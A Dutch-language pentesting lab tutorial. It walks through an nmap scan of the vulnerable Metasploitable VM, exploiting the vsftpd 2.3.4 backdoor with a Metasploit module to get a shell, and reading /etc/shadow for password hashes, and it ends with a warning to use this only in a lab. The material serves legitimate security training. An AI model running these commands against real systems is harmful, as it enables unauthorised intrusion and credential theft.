Metasploitable is een speciaal ontworpen kwetsbare Linux-machine, ideaal om je pentesting-skills te oefenen. Metasploit is een krachtig framework waarmee je kwetsbaarheden kunt vinden en uitbuiten. In deze guide leer je hoe je met nmap services scant, een kwetsbaarheid identificeert, en deze uitbuit met Metasploit.
Begin met het scannen van het doelwit (bijvoorbeeld het IP-adres van Metasploitable) om te ontdekken welke services draaien en op welke poorten.
nmap -sV <doelwit-ip>
-sV zorgt ervoor dat nmap probeert te achterhalen welke service en versie op een poort draait.21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1
...
Zoek in de nmap-output naar bekende kwetsbare services. In dit voorbeeld zie je vsftpd 2.3.4 op poort 21. Deze versie staat bekend als kwetsbaar voor een backdoor exploit.
Start Metasploit met het commando:
msfconsole
Wacht tot de console geladen is.
Zoek naar een exploit voor de gevonden kwetsbaarheid, bijvoorbeeld voor vsftpd 2.3.4:
search vsftpd
Kies de juiste exploit, bijvoorbeeld:
use exploit/unix/ftp/vsftpd_234_backdoor
Bekijk welke opties je moet instellen:
show options
Stel het doelwit in:
set RHOSTS <doelwit-ip>
set RPORT 21
Start de exploit:
exploit
Als het lukt, krijg je een shell op het systeem.
Nu je een shell hebt, kun je op zoek naar gevoelige bestanden zoals /etc/shadow, waar de wachtwoordhashes van gebruikers staan.
cat /etc/shadow
Let op: Je hebt meestal root-rechten nodig om deze file te lezen. Sommige exploits geven direct een root-shell, anderen niet.
/etc/shadow.Gebruik deze kennis alleen in een gecontroleerde labomgeving zoals Metasploitable. Het testen van systemen zonder toestemming is strafbaar (zie ethiek).